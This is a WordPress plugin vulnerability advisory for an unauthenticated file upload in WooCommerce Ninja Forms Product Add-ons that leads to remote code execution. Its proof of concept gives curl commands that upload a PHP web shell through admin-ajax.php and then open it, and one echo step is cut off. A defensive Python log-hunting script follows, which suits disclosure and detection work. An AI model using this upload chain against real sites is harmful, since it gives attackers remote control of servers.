wpvulndb WPVDB-ID:0035EC5E-D405-4EB7-8FE4-29DD0C71E4BC
Oct 16, 2023 - 12:00 a.m.

WooCommerce Ninja Forms Product Add-ons < 1.7.1 - Unauthenticated Arbitrary File Upload

2023-10-16 00:00:00
wpscan.com
woocommerce ninja forms
unauthenticated
arbitrary file upload
rce
vulnerability

AI Score: 9.8
Confidence: High
EPSS: 0.002
Percentile: 58.8%

Description

The plugin does not validate the file to be uploaded, allowing any unauthenticated user to upload arbitrary files to the server, leading to RCE.

PoC

Make sure to have both WooCommerce and NinjaForms 3.4.34.2 (NF’s latest version on the 3.4 branch) installed, then follow these instructions:

1 - Run the following shell command to create a PHP file whose MIME type will be detected as text/plain: echo 'Hello world! shell.php
2 - Run the following curl command to upload the malicious PHP file onto the site: curl 'https://example.com/wp-admin/admin-ajax.php' -F 'action=wc_nf_submit' -F 'f[][email protected]'
3 - Visit the uploaded shell at https://example.com/wp-content/uploads/YYYY/MM/shell.php
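For defenders, the request order in the steps above (a POST to admin-ajax.php, then a request for a PHP file under the dated uploads directory) can be hunted for in web access logs. The following is an added example, not part of the original advisory; the Combined Log Format, the 30-minute correlation window and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Prefix of a Combined Log Format line: ip - user [time] "METHOD path proto" status
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Script-like extensions requested under the dated uploads tree (YYYY/MM/).
UPLOADED_SCRIPT = re.compile(
    r'^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.(?:php\d?|phtml|phar)(?:[/?]|$)',
    re.I)
AJAX = "/wp-admin/admin-ajax.php"
WINDOW = timedelta(minutes=30)  # assumed correlation window, tune per site


def find_suspicious(lines):
    """Return (ip, path, correlated) for each successful script hit in uploads.

    correlated is True when the same client POSTed to admin-ajax.php within
    WINDOW before the hit, i.e. the upload-then-visit order of the PoC.
    """
    last_ajax_post, findings = {}, []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and path.split("?")[0] == AJAX:
            last_ajax_post[ip] = ts
        elif UPLOADED_SCRIPT.match(path) and m["status"].startswith("2"):
            seen = last_ajax_post.get(ip)
            correlated = seen is not None and timedelta(0) <= ts - seen <= WINDOW
            findings.append((ip, path, correlated))
    return findings


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [16/Oct/2023:10:00:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "curl/8.1.2"',
    '203.0.113.7 - - [16/Oct/2023:10:00:05 +0000] "GET /wp-content/uploads/2023/10/shell.php HTTP/1.1" 200 12 "-" "curl/8.1.2"',
    '198.51.100.4 - - [16/Oct/2023:10:01:00 +0000] "GET /wp-content/uploads/2023/10/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Oct/2023:11:00:00 +0000] "GET /wp-content/uploads/2023/09/old.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Oct/2023:11:00:02 +0000] "GET /wp-content/uploads/2023/10/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE):
        print(finding)
```

Any 2xx response for a script under uploads deserves review even when uncorrelated, since a legitimate WordPress site has no reason to execute PHP from that directory.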
